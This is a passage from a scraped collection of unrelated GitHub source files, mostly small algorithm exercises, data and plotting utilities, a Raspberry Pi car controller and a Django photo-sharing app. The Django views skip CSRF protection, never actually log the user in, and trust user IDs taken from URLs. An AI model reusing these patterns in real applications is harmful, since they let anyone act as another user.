如果想象这个过程其实就是跟从头到尾浏览\n # double linked list 是一样的。 只需要记住第一个和最后一个node 是什么,好让当前的node 和最后一个node 相连接就可以了\n # 第一个node 只起到一个作用就是在最后的时候和最后一个node 连接形成闭环\n def helper(root: 'Node') -> 'Node':\n nonlocal first, last\n if not root:\n return None\n helper(root.left)\n if last:\n last.right = root\n root.left = last\n else:\n first = root\n last = root\n helper(root.right)\n\n if not root:\n return None\n first, last = None, None\n helper(root)\n last.right = first\n first.left = last\n return first","repo_name":"latree/leetcode","sub_path":"Tree/convert_BST_double_Linked_list.py","file_name":"convert_BST_double_Linked_list.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30123017018","text":"#!/usr/bin/python3\n'''Lockbox Class'''\n\n\ndef canUnlockAll(boxes):\n '''Unlock Box Method'''\n if type(boxes) is list:\n keys = [0]\n\n for k in keys:\n for x in boxes[k]:\n if x not in keys and x < len(boxes):\n keys.append(x)\n\n if len(keys) == len(boxes):\n return True\n\n else:\n return False\n","repo_name":"Seb1776/holbertonschool-interview","sub_path":"0x00-lockboxes/0-lockboxes.py","file_name":"0-lockboxes.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32559807386","text":"import os\nimport re\nimport json\n\n# pylint: disable=too-many-branches\n\n\ndef get_old_dic():\n ''' hacky get hardcoded reference dic\n '''\n cache = os.path.join(\n os.path.dirname(\n os.path.abspath(__file__)),\n '..',\n 'cache')\n fname = os.path.join(cache, 'id_reference.json')\n with open(fname) as f:\n old_dic = json.load(f)\n return old_dic\n\n\ndef get_v3_to_v4_annos_dic(details):\n old_dic = get_old_dic()\n all_classes = set([int(r) for r in old_dic])\n\n new_partname2id = {}\n for cat in all_classes:\n new_partname2id[cat] = {\n 'name': old_dic[str(cat)]['name'], 'parts': {}}\n for part in details.getParts(cat=cat):\n new_partname2id[cat]['parts'][part['name']] = 
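The threeSum record above probes nums[j+1:] with 'in' for every pair (roughly cubic overall) and only prints its result. The standard O(n^2) sort-and-two-pointers sketch, for comparison:

def three_sum(nums):
    nums.sort()
    out = []
    for i in range(len(nums) - 2):
        if i > 0 and nums[i] == nums[i - 1]:   # skip duplicate anchors
            continue
        lo, hi = i + 1, len(nums) - 1
        while lo < hi:
            s = nums[i] + nums[lo] + nums[hi]
            if s < 0:
                lo += 1
            elif s > 0:
                hi -= 1
            else:
                out.append([nums[i], nums[lo], nums[hi]])
                while lo < hi and nums[lo] == nums[lo + 1]:
                    lo += 1
                while lo < hi and nums[hi] == nums[hi - 1]:
                    hi -= 1
                lo += 1
                hi -= 1
    return out

# three_sum([-1, 0, 1, 2, -1, -4]) -> [[-1, -1, 2], [-1, 0, 1]]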
part['part_id']\n\n v3_to_v4_convert = {}\n for cat in old_dic:\n cat_id = int(cat)\n v3_to_v4_convert[cat_id] = {}\n parts = old_dic[cat]['parts']\n choices = new_partname2id[cat_id]['parts']\n for part in parts:\n pname = parts[part]\n pname = pname.replace(\"_\", \"\")\n pname = re.sub(r\"\\d\", \"\", pname)\n # For train\n pname = re.sub(\"([hc])(left|right)\", r'\\1leftright', pname)\n if pname in choices:\n v3_to_v4_convert[cat_id][part] = choices[pname]\n continue\n\n # lower/upper legs merged in some (if not already matched)\n pname = re.sub(\"([lr])([fb])([lu])\", r'\\1\\2', pname)\n # Hoofs and paws combined\n pname = re.sub(\"([lr])([fb])([ho]|[pa]){2}\", r'\\1\\2hopa', pname)\n if pname in choices:\n v3_to_v4_convert[cat_id][part] = choices[pname]\n continue\n\n if pname == 'beak':\n if 'muzzle' in choices:\n v3_to_v4_convert[cat_id][part] = choices['muzzle']\n continue\n if 'nose' in choices:\n v3_to_v4_convert[cat_id][part] = choices['nose']\n continue\n elif pname == 'muzzle':\n if 'nose' in choices:\n v3_to_v4_convert[cat_id][part] = choices['nose']\n continue\n if 'beak' in choices:\n v3_to_v4_convert[cat_id][part] = choices['beak']\n continue\n elif pname == 'nose':\n if 'muzzle' in choices:\n v3_to_v4_convert[cat_id][part] = choices['muzzle']\n continue\n if 'beak' in choices:\n v3_to_v4_convert[cat_id][part] = choices['beak']\n continue\n\n if cat_id == 25:\n # bird\n if pname in ['lhorn', 'rhorn', 'lear', 'rear']:\n # there aren't any real \"horns\" on birds - say head\n # hardcoded\n v3_to_v4_convert[cat_id][part] = choices['head']\n continue\n elif pname in ['nose', 'muzzle']:\n v3_to_v4_convert[cat_id][part] = choices['beak']\n continue\n\n elif cat_id == 113:\n # hrose\n if pname == 'beak':\n v3_to_v4_convert[cat_id][part] = choices['muzzle']\n continue\n elif pname == 'lhorn':\n v3_to_v4_convert[cat_id][part] = choices['lear']\n continue\n elif pname == 'rhorn':\n v3_to_v4_convert[cat_id][part] = choices['rear']\n continue\n elif cat_id in [23, 258]:\n # Bike and motorbike\n if pname == 'body':\n v3_to_v4_convert[cat_id][part] = choices['silh']\n continue\n if pname == 'chainwheel':\n v3_to_v4_convert[cat_id][part] = choices['silh']\n continue\n elif cat_id == 427:\n if pname == 'screen':\n v3_to_v4_convert[cat_id][part] = choices['framescreen']\n continue\n elif cat_id == 65:\n if 'horn' in pname:\n v3_to_v4_convert[cat_id][part] = choices[pname[0] + 'ear']\n continue\n return v3_to_v4_convert\n","repo_name":"princetonvisualai/pointingqa","sub_path":"dataset-code/intentqa/ObjPartUI/examples/weak/notebooks/point_analytics/convert_part_ids.py","file_name":"convert_part_ids.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"42357607834","text":"import io\nimport os\n\nfrom dotenv import load_dotenv\n\nimport boto3\n\nload_dotenv()\n\ns3 = boto3.client(\n \"s3\",\n aws_access_key_id=os.getenv('AWS_ACCESS_KEY_ID'),\n aws_secret_access_key=os.getenv('AWS_SECRET_ACCESS_KEY')\n)\n\n\ndef uploadPILtoBucket(image, filename):\n BUCKET = os.getenv('AWS_BUCKET_NAME')\n ENDPOINT = os.getenv('AWS_DOMAIN')\n\n temp_file = io.BytesIO()\n image.save(temp_file, format=\"JPEG\")\n temp_file.seek(0)\n\n s3.upload_fileobj(\n Fileobj=temp_file,\n Bucket=BUCKET,\n Key=filename,\n ExtraArgs={\"ContentType\": \"image/jpeg\"}\n )\n\n url = s3.generate_presigned_url(\n ClientMethod='get_object',\n Params={'Bucket': BUCKET, 'Key': filename},\n ExpiresIn=172800\n )\n\n return 
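The beak/muzzle/nose branches in the record above all encode the same "first synonym that exists" fallback. A small hypothetical helper sketch that would collapse them:

def first_available(choices, *names):
    """Return choices[name] for the first name present, else None."""
    for name in names:
        if name in choices:
            return choices[name]
    return None

# e.g. first_available(choices, 'muzzle', 'nose')  # the 'beak' branch above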
url\n","repo_name":"wongyuhao/MOMO","sub_path":"s3_util.py","file_name":"s3_util.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"20549167202","text":"from typing import Any, Dict, List, Optional\n\nimport altair as alt\nimport deneb as den\nimport pandas as pd\n\n\ndef fig_metric(\n df: pd.DataFrame,\n metric: str,\n title: Optional[str] = None,\n title_dx: int = 0,\n width: Optional[int] = None,\n height: Optional[int] = None,\n labels: bool = True,\n keywords: Dict[str, Any] = {},\n style: Dict[str, Any] = {},\n default_color: str = \"#000000\",\n colors_dict: Dict[str, Any] = {},\n config: Optional[str] = None,\n):\n \"\"\"Plots metrics\n\n Args:\n df: Dataframe which at least has columns `algorithm`, `num_simulations` and\n a column titled accordingly to `metric`.\n metric: Metric to plot, should be a column in `df`.\n title: Title for plot\n title_dx: x-direction offset for title\n labels: Whether to plot labels\n seed: Seed\n width: Width\n height: Height\n default_color: Default color of samples\n colors_dict: Dictionary of colors\n config: Optional string to load predefined config\n style: Optional dictionary for `den.set_style`\n keywords: Optional dictionary passed on to `den.lineplot`\n\n Returns:\n Chart\n\n Note:\n Due to an open issue on vega-lite, it is difficult to sort columns in\n non-alphabetical fashion (i.e., ordered by algorithm name). As a workaround,\n consider prepending an algorithm with a space to have it listed first, e.g.\n `df.loc[df[\"algorithm\"] == \"REJ-ABC\", \"algorithm\"] = \" REJ-ABC\"`.\n See also: https://github.com/vega/vega-lite/issues/5366/\n \"\"\"\n colors = {}\n for algorithm in df.algorithm.unique():\n algorithm_stripped = algorithm.strip()\n if algorithm_stripped not in colors_dict:\n colors[algorithm] = default_color\n else:\n colors[algorithm] = colors_dict[algorithm_stripped]\n\n keywords[\"column_labels\"] = labels\n keywords[\"color\"] = den.colorscale(colors, shorthand=\"algorithm:N\")\n\n x_axis_kwargs = {}\n y_axis_kwargs = {}\n\n if config == \"manuscript\":\n keywords[\"width\"] = 700 / len(df.algorithm.unique()) if width is None else width\n keywords[\"height\"] = 65 if height is None else height\n style[\"font_size\"] = 12\n style[\"font_family\"] = \"Inter\"\n y_axis_kwargs = {\"minExtent\": 60}\n\n if config == \"streamlit\":\n keywords[\"width\"] = None if width is None else width\n keywords[\"height\"] = None if height is None else height\n style[\"font_size\"] = 16\n\n keywords[\"limits\"] = None\n keywords[\"log_y\"] = False\n keywords[\"y_axis\"] = alt.Axis(title=metric)\n\n if \"MMD\" in metric:\n keywords[\"y_axis\"] = alt.Axis(title=\"MMD²\")\n\n if \"C2ST\" in metric:\n keywords[\"limits\"] = [0.5, 1.0]\n\n if metric == \"RT\":\n keywords[\"log_y\"] = True\n keywords[\"limits\"] = [0.001, 1000.0]\n keywords[\"y_axis\"] = alt.Axis(\n values=[0.001, 0.01, 0.1, 0.0, 1.0, 10.0, 100.0, 1000.0]\n )\n\n alt.themes.enable(\"default\")\n\n den.set_style(\n extra={\n \"config\": {\n \"axisX\": {\n \"grid\": False,\n \"labelAngle\": 270,\n \"domain\": False,\n \"domainWidth\": 0,\n \"ticks\": True,\n \"tickWidth\": 0,\n \"minExtent\": 0,\n **x_axis_kwargs,\n },\n \"axisY\": {\n \"domain\": False,\n \"domainWidth\": 0,\n \"ticks\": True,\n \"tickWidth\": 0,\n \"grid\": True,\n \"titlePadding\": 0,\n \"tickCount\": 6.0,\n **y_axis_kwargs,\n },\n }\n },\n **style,\n )\n\n chart = den.lineplot(\n df.sort_values(\"algorithm\"),\n 
x=\"num_simulations:O\",\n y=f\"{metric}:Q\",\n error_extent=\"ci\",\n column=\"algorithm:N\",\n independent_y=False,\n row_title=\"\",\n column_title=\"Number of Simulations\",\n title_orient=\"bottom\",\n **keywords,\n )\n\n chart = chart.configure_point(size=50).configure_line(size=1.5)\n\n if title is not None:\n chart = chart.properties(title={\"text\": [title]}).configure_title(\n offset=10, orient=\"top\", anchor=\"middle\", dx=title_dx\n )\n\n return chart\n","repo_name":"amortizedgbi/amortizedgbi","sub_path":"packages/sbibm/sbibm/visualisation/metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":4414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"38507087911","text":"from django.shortcuts import render, redirect\nimport uuid\nimport boto3\n# from django.db.models import RawSQL\nfrom .models import Photo,Post, Post_User, Photo_User\nfrom django.views.generic import ListView, DetailView, CreateView\n# Add the two imports below\nfrom django.contrib.auth import login, authenticate\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm\nfrom .forms import SignUpForm\nfrom .forms import PictureForm\nfrom datetime import date\nfrom django.utils import timezone \nfrom django.db import connection\nfrom django.views.decorators.csrf import csrf_exempt\n\nBUCKET = 'furiends'\nS3_BASE_URL = f'https://{BUCKET}.s3.ca-central-1.amazonaws.com'\n\n\ndef home(request, user_id):\n user_instance = User.objects.get(pk=user_id)\n user_pic = None\n picture_form = PictureForm()\n query_photo_like = \"\"\"\n select photo_id, count(photo_id) photo_count from main_app_photo_user group by photo_id\n \"\"\"\n with connection.cursor() as cursor:\n cursor.execute(query_photo_like)\n columns = [col[0] for col in cursor.description]\n photo_like = [dict(zip(columns, row)) for row in cursor.fetchall() ]\n query_comment = \"\"\"\n select mp.id, mp.photo_id, mp.user_id, mp.caption, au.username from main_app_post mp\n left join auth_user au\n on mp.user_id = au.id\n order by mp.photo_id, mp.id desc\n \"\"\"\n with connection.cursor() as cursor:\n cursor.execute(query_comment)\n columns = [col[0] for col in cursor.description]\n comments = [dict(zip(columns, row)) for row in cursor.fetchall() ]\n query_liked = \"\"\"\n select ap.*, pu.user_id liked, au.username from main_app_photo ap\n left join \n (select * from main_app_photo_user where user_id = %s) pu\n on ap.id = pu.photo_id\n left join auth_user au\n on ap.user_id = au.id\n where ap.category = 2\n order by ap.id desc\n \"\"\"\n with connection.cursor() as cursor:\n cursor.execute(query_liked, [user_id])\n columns = [col[0] for col in cursor.description]\n photo = [dict(zip(columns, row)) for row in cursor.fetchall() ]\n \n try:\n user_pic = Photo.objects.filter(user = user_instance, category=1)[0]\n except:\n pass\n like_comment = Photo_User.objects.all()\n try: \n photos_profile = Photo.objects.filter(category=1)\n return render(request, 'home.html', {\n 'picture_form': picture_form, 'user_id': user_id, 'photo': photos_profile, 'posts': photo, 'photo_like': photo_like,\n 'username': user_instance.username, 'user_pic': user_pic, 'comments': comments, 'like_comment': like_comment\n })\n except:\n # print(photos_profile)\n return render(request, 'home.html', {\n 'picture_form': picture_form, 'user_id': user_id, 'posts': photo, 'username': user_instance.username, 'user_pic': user_pic, 'comments': comments})\n\n\ndef PostCreate(request, 
user_id, photo_id):\n photos = Photo.objects.get(pk=photo_id)\n username = User.objects.get(pk=user_id)\n# user_instance = User.objects.get(pk=user_id)\n# posts = Post.objects.filter(photo=photos).order_by('-id')\n query = \"\"\"\n select mp.*, au.first_name, aa.count total_likes, mapu.post_id like_by_user from main_app_post mp\n left join (\n select post_id, count(post_id) count from main_app_post_user group by post_id\n\t ) aa\n on mp.id = aa.post_id\n left join auth_user au\n\t on mp.user_id = au.id\n left join \n\t (select * from main_app_post_user where user_id = %s) mapu\n\t on mp.id = mapu.post_id\n where mp.photo_id = %s\n order by id desc\n \"\"\"\n with connection.cursor() as cursor:\n cursor.execute(query, [user_id, photo_id])\n columns = [col[0] for col in cursor.description]\n posts = [dict(zip(columns, row)) for row in cursor.fetchall() ]\n return render(request, 'picture_comment.html', {'photos': photos, \n 'user_id': user_id, 'posts':posts, 'photo_id': photo_id, 'username': username})\n\n\ndef create_photo_like(request, user_id, photo_id):\n try:\n Photo_User.objects.get(user_id=user_id, photo_id=photo_id).delete()\n except:\n Photo_User.objects.create(user_id = user_id, photo_id=photo_id)\n return redirect(f\"/home/{user_id}/\")\n\n\ndef delete_photo(request, user_id, photo_id):\n user_instance = User.objects.get(pk=user_id)\n photo_instance = Photo.objects.get(pk=photo_id)\n try: \n for post in Post.objects.filter(photo=photo_instance):\n Post_User.objects.filter(post_id = post.id).delete()\n\n Photo_User.objects.filter(photo_id=photo_id).delete()\n \n Photo.objects.filter(pk=photo_id).delete()\n return redirect(f\"/home/{user_id}/\")\n except:\n return redirect(f\"/home/{user_id}/\")\n\n@csrf_exempt\ndef index(request):\n # category = request.POST.get('category')\n # user_instance = User.objects.get(pk=user_id)\n photos = Photo.objects.all()\n # photos =Photo.objects.filter(category=category, user=user_instance)\n # print(photos.reverse())\n return render(request, \"registration/login.html\", {'photos': photos})\n\n@csrf_exempt\ndef login_auth(request):\n print(request.POST)\n username = request.POST['username']\n password = request.POST['password']\n user_id = User.objects.get(username=username)\n # print(user_id.id)\n user = authenticate(request, username=username, password=password)\n if user is not None:\n return redirect(f'/home/{user_id.id}/')\n # Redirect to a success page.\n else:\n return redirect('/')\n \n# def delete_photo(request, photo_id):\n# Photo.objects.delete(pk=photo_id)\n# return redirect('home.html')\n\ndef PostCreateDelete(request, user_id, post_id, photo_id):\n print(user_id, post_id)\n user_instance = User.objects.get(pk=user_id)\n Post.objects.filter(pk=post_id, user=user_instance).delete()\n try:\n Post_User.objects.filter(user_id=user_id, post_id=post_id).delete()\n return redirect(f\"/post/create/{user_id}/photo/{photo_id}/\")\n except:\n return redirect(f\"/post/create/{user_id}/photo/{photo_id}/\")\n\ndef add_photo(request, user_id):\n photo_file = request.FILES.get('photo-file', None)\n caption = request.POST.get('caption')\n category = request.POST.get('category')\n user_instance = User.objects.get(pk=user_id)\n\n if request.method == 'POST': \n # to remove old profile pic and update it with the new one\n if category == '1':\n print('coming to this')\n Photo.objects.filter(user=user_instance, category=category).delete()\n # for photo upload\n if photo_file:\n s3 = boto3.client('s3')\n key = 'furiends/' + uuid.uuid4().hex[:6] + 
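The cursor.description/zip(...) dance above is repeated for every raw query in this file; Django's own documentation suggests factoring it into a dictfetchall helper, sketched here:

def dictfetchall(cursor):
    """Return all rows from a cursor as a list of dicts keyed by column name."""
    columns = [col[0] for col in cursor.description]
    return [dict(zip(columns, row)) for row in cursor.fetchall()]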
photo_file.name[photo_file.name.rfind('.'):]\n try:\n s3.upload_fileobj(photo_file, BUCKET, key)\n url = f\"{S3_BASE_URL}/{key}\"\n # print(url)\n # print(user_id) \n user = User.objects.get(pk=user_id)\n # print(user)\n # print(type(date.today()))\n Photo.objects.create(url=url, user=user_instance, caption=caption, likes=0, category=category)\n # print('done')\n except:\n print('An error occurred uploading file to S3')\n return redirect(f'/home/{user_id}/')\n else:\n return redirect(f'/home/{user_id}/')\n\n# Create your views here.\ndef signup(request):\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n raw_password = form.cleaned_data.get('password1')\n user = authenticate(username=username, password=raw_password)\n login(request, user)\n return redirect('/')\n else:\n form = SignUpForm()\n return render(request, 'registration/signup.html', {'form': form})\n\ndef about(request):\n return render(request, 'about.html')\n\ndef my_profile(request, user_id):\n photo = None\n photos = None\n user_instance = User.objects.get(pk=user_id)\n try:\n photo = Photo.objects.filter(user_id=user_instance, category=1)[0]\n except:\n pass\n try:\n photos = Photo.objects.filter(user_id=user_instance, category=2)\n except:\n pass\n \n return render(request, 'my_profile.html', {'user_id': user_id, 'photo': photo, 'photos': photos})\n\ndef post_detail(request, post_id):\n post = Post.objects.get(id=post_id)\n return render(request, 'my_profile/post_detail.html', {'post': post\n })\n\ndef add_picture(request, user):\n form = PictureForm(request.POST)\n if form.is_valid():\n new_picture = form.save(commit=False)\n new_picture.picture_id = user\n new_picture.save()\n return render('home.html')\n\n@csrf_exempt \ndef PostCreateComment(request, user_id, photo_id):\n if request.method == 'POST' and request.POST.get('comment'):\n post = request.POST.get('comment')\n user = User.objects.get(pk=user_id)\n photos = Photo.objects.get(pk=photo_id)\n Post.objects.create(caption=post, likes=0, user=user, photo=photos)\n return redirect(f\"/post/create/{user_id}/photo/{photo_id}/\")\n else:\n return redirect(f\"/post/create/{user_id}/photo/{photo_id}/\")\n \n\ndef Likes_Create_Delete(request, user_id, post_id, photo_id):\n # print(user_id, post_id)\n try:\n Post_User.objects.get(user_id=user_id, post_id=post_id).delete()\n except:\n Post_User.objects.create(user_id = user_id, post_id=post_id)\n return redirect(f\"/post/create/{user_id}/photo/{photo_id}/\")\n\ndef total_likes(request, user_id, post_id, photo_id):\n return redirect(f\"/post/create/{user_id}/photo/{photo_id}/\")\n","repo_name":"jfranzm/Furiends","sub_path":"main_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40972429927","text":"import threading # Modul threads\nimport time # Modul time\nimport math\nimport statistics\nfrom setup import * # GPIO Setup importieren und ausführen\nfrom abstand import distanz # Funktion für Wandabstandmessen importieren\nfrom aufraeumen import aufraeumen,bremsen,losfahren # Funktion für cleanup() importieren\n\nspeed = 3 # 1 bis 4 (*25) (% Tastverhältnis)\n\n#\ndef forward():\n pr.ChangeDutyCycle(speed*25) # Motor A, 100% Tastverhältnis\n pl.ChangeDutyCycle(speed*25) # Motor B, 100% Tastverhältnis\n return\n# \ndef lenken(steer):\n speedHead = (100-speed*25)/25\n if steer < 1:\n 
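The S3 key built in add_photo above is six hex characters of a uuid4 plus the original file extension. The same scheme as a standalone sketch (hypothetical make_key, assuming the filename has an extension):

import os
import uuid

def make_key(filename, prefix="furiends/"):
    ext = os.path.splitext(filename)[1]        # keeps the leading dot
    return prefix + uuid.uuid4().hex[:6] + ext

# make_key("dog.jpg") -> e.g. 'furiends/3fa2b1.jpg'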
pr.ChangeDutyCycle(((1-steer)*speedHead+speed)*25) # \n pl.ChangeDutyCycle(steer*speed*25) # \n elif steer > 1:\n steer = 2-steer\n pr.ChangeDutyCycle(steer*speed*25) # \n pl.ChangeDutyCycle(((1-steer)*speedHead+speed)*25) # \n return\n\ndef wandfahren(delay, run_event):\n zielAngle = 0\n angle = 0\n zielDist = 30\n steer = 0\n dist = distanz(\"L\")\n lastDist = dist\n vorne = 40 #distanz(\"R\")\n lastVorne = vorne\n lastSteer = 1\n \n print (\"Distanz: \", dist)\n \n while run_event.is_set():\n time.sleep(delay)\n \n lastDist = dist\n dist = statistics.median([distanz(\"L\"),distanz(\"L\"),distanz(\"L\"),distanz(\"L\"),distanz(\"L\"),distanz(\"L\"),distanz(\"L\"),distanz(\"L\"),distanz(\"L\"),distanz(\"L\"),distanz(\"L\"),distanz(\"L\"),distanz(\"L\"),distanz(\"L\")])\n lastVorne = vorne\n vorne = 40 #distanz(\"R\")\n lastSteer = steer\n\n zielAngle = math.degrees(-math.atan((zielDist-dist)/20)) # Winkel zum ziel-Abstand\n angle = math.degrees(math.atan((lastDist-dist)/10)) # Vermutlicher Winkel des Autos zur Wand\n \n if zielAngle == angle:\n steer = 1\n elif angle < zielAngle:\n diffAngle = angle + zielAngle\n if angle < 0 and zielAngle > 0:\n diffAngle = -(angle - zielAngle)\n diffAngle = 1-diffAngle/90\n steer = diffAngle\n steer = ((angle+90)/(zielAngle+90))**speed\n #steer = 0.5\n elif angle > zielAngle:\n diffAngle = angle + zielAngle\n if angle > 0 and zielAngle < 0:\n diffAngle = zielAngle - angle\n diffAngle = 1-diffAngle/90\n steer = diffAngle\n steer = 2-(((zielAngle+90)/(angle+90))**speed)\n #steer = 1.5\n \n if steer > 2:\n steer = 2\n if steer < 0:\n steer = 0\n \n steer = (lastSteer + steer)/2\n \n print(\" \"*int(dist),\"█\",\" \"*int(70-dist),\"d = %.1f cm\" % dist,\";s = %.2f\" % steer,\";a = %.1f°\" % angle,\";z = %.1f°\" % zielAngle,\";d = %.1f°\" % diffAngle)\n print(\" \"*zielDist,\"|\")\n \n if vorne < 10 and lastVorne < 10:\n bremsen()\n print(\"Bremsen!\")\n return\n elif vorne < 30 and lastVorne < 30:\n lenken(2)\n print(\"Lenken!\")\n time.sleep(.4)\n elif abs(lastDist-dist) < 20:\n lenken(steer)\n \ndef main():\n\n \n \n losfahren()\n pr.start(speed) # Motor A, speed% Tastverhältnis\n pl.start(speed) # Motor B, speed% Tastverhältnis\n \n run_event = threading.Event()\n run_event.set()\n \n th1_delay = .02 # sleep dauer der Funktion\n th1 = threading.Thread(target = wandfahren, args = (th1_delay,run_event)) # Funkton in einem neuen Thread zuordnen\n\n th1.start() # Thread starten\n\n # Warten bis Srtg+C gedrückt wird:\n try:\n time.sleep(1)\n \n except KeyboardInterrupt:\n print (\"attempting to close threads. 
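The target-angle line in wandfahren above, isolated as a sketch: the controller aims at a point on the desired wall-distance line roughly 20 cm ahead, so a 10 cm distance error maps to about 26.6 degrees.

import math

def target_angle(dist_cm, ziel_dist_cm=30, lookahead_cm=20):
    return math.degrees(-math.atan((ziel_dist_cm - dist_cm) / lookahead_cm))

# target_angle(40) ~ +26.6 deg, target_angle(20) ~ -26.6 deg
# (the sign flips with the direction of the distance error)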
Max wait =\", max(th1_delay,0)) # Bei mehreren Threads: 0 durch th2_delay erstzen\n run_event.clear()\n th1.join()\n aufraeumen()\n print (\"threads successfully closed\")\n\nif __name__ == '__main__':\n main()","repo_name":"MirCore/ITS-RaspberryCar","sub_path":"challenges/challenge2_funktioniert.py","file_name":"challenge2_funktioniert.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"9522996955","text":"import json\nimport logging\nimport urlparse\n\nfrom handlers.BaseHandler import BaseHandler\nfrom models.GoogleDocsChange import GoogleDocsChange\n\n\nclass NotificationCallbackHandler(BaseHandler):\n \"\"\"\n Request handling class for /notification\n \"\"\"\n\n def post(self):\n \"\"\"\n POST request handling method.\n\n Stores incoming changes using GAE datastore API\n \"\"\"\n\n # Ignore sync message.\n if self.request.headers['X-Goog-Resource-State'] == 'sync':\n return\n\n # Receive user_id and change_id\n user_id = dict(urlparse.parse_qsl(self.request.headers['X-Goog-Channel-Token']))['user_id']\n change_id = json.loads(self.request.body)['id']\n\n logging.debug(\"User id receiving change: {0}\".format(str(user_id)))\n logging.debug(\"change id: {0}\".format(str(change_id)))\n\n entity = GoogleDocsChange.get_or_insert(str(user_id), user_id=user_id)\n if change_id not in entity.change_ids:\n entity.change_ids.append(change_id)\n entity.save()\n self.response.set_status(200)","repo_name":"Doxxer/AUGoogleNotifier","sub_path":"AppServer/handlers/NotificationCallbackHandler.py","file_name":"NotificationCallbackHandler.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33047259534","text":"####\nfrom scipy.signal import savgol_filter as sgfilter\nfrom numpy import *\nfrom matplotlib.pyplot import *\n\nimport glob\nimport os\n\ncolors = ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728', '#9467bd', '#8c564b', '#e377c2', '#7f7f7f', '#bcbd22', '#17becf']\n\nall_files = glob.glob('logs/*.npy')\nfig, ax = subplots(3)\nax[0].set_title('Train losses')\nax[0].set_ylabel('loss')\nax[0].grid()\n\nax[1].set_title('Valid losse')\nax[1].set_ylim(0,1)\nax[1].set_ylabel('loss')\nax[1].grid()\n\n\nax[2].set_title('Acurracy')\nax[2].set_ylabel('%')\nax[2].set_xlabel('Train step')\nax[2].grid()\n\n\nfor num, each_log in enumerate(all_files):\n MODEl_NAME = os.path.basename(each_log)[:-4]\n print(num+1,MODEl_NAME)\n datas = np.load(each_log,allow_pickle=True)\n \n\n for index,each_data in enumerate(datas):\n this_x = range(1,len(each_data)+1 )\n\n if (len(each_data)>51):\n \tax[index].plot(this_x, sgfilter(each_data,51,2) ,\"-\" , color=colors[num] ,label=MODEl_NAME )\n elif (len(each_data)>3):\n \tax[index].plot(this_x, sgfilter(each_data,3,1) ,\"-\" , color=colors[num] ,label=MODEl_NAME )\n else:\n \tax[index].plot(this_x, each_data ,\"-\" , color=colors[num] ,label=MODEl_NAME )\n\n ax[index].plot(this_x, each_data ,\"-\" ,alpha = 0.2, color=colors[num])\n ax[index].legend(fontsize=8)\n\nfig.autofmt_xdate()\nfig.tight_layout()\nshow()\n\n\n","repo_name":"OuYangMinOa/AI-play-kartrider-shift","sub_path":"show_log.py","file_name":"show_log.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"384865332","text":"\"\"\"Kata url: https://www.codewars.com/kata/523a86aa4230ebb5420001e1.\"\"\"\n\nfrom typing 
import List\n\n\ndef anagrams(word: str, words: List[str]) -> List[str]:\n sorted_word: List[str] = sorted(word)\n return [wrd for wrd in words if sorted(wrd) == sorted_word]\n\n\ndef test_anagrams():\n assert anagrams(\"abba\", [\"aabb\", \"abcd\", \"bbaa\", \"dada\"]) == [\"aabb\", \"bbaa\"]\n assert anagrams(\"racer\", [\"crazer\", \"carer\", \"racar\", \"caers\", \"racer\"]) == [\n \"carer\",\n \"racer\",\n ]\n","repo_name":"Sigmanificient/codewars","sub_path":"src/python/katas/py5kyu/where_my_anagrams_at.py","file_name":"where_my_anagrams_at.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"23384677371","text":"import sys\r\n\r\n\r\ndef solve(instream):\r\n board = [instream.readline().strip() for x in range(4)]\r\n instream.readline()\r\n\r\n for ch in (\"X\", \"O\"):\r\n won = False\r\n for row in range(4):\r\n won = won or all(x in (ch, \"T\") for x in board[row])\r\n\r\n for col in range(4):\r\n won = won or all(x[col] in (ch, \"T\") for x in board)\r\n\r\n won = won or all(board[i][i] in (ch, \"T\") for i in range(4))\r\n won = won or all(board[3 - i][i] in (ch, \"T\") for i in range(4))\r\n if won:\r\n return \"{} won\".format(ch)\r\n\r\n completed = all([all(cell != \".\" for cell in row) for row in board])\r\n if completed:\r\n return \"Draw\"\r\n else:\r\n return \"Game has not completed\"\r\n\r\ndef run():\r\n cases = int(sys.stdin.readline().strip())\r\n for i in range(cases):\r\n print(\"Case #{}: {}\".format(i + 1, solve(sys.stdin)))\r\n\r\nif __name__ == \"__main__\":\r\n run()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_116/648.py","file_name":"648.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74179078914","text":"from typing import (Sequence,\n Type,\n Union)\n\nfrom .hints import (Empty,\n Linear,\n Maybe,\n Mix,\n Multipoint,\n Multisegment,\n Point,\n Segment,\n Shaped)\n\n\ndef pack_mix(discrete: Maybe[Multipoint],\n linear: Maybe[Linear],\n shaped: Maybe[Shaped],\n empty: Empty,\n mix_cls: Type[Mix]\n ) -> Union[Empty, Linear, Mix, Multipoint, Shaped]:\n return 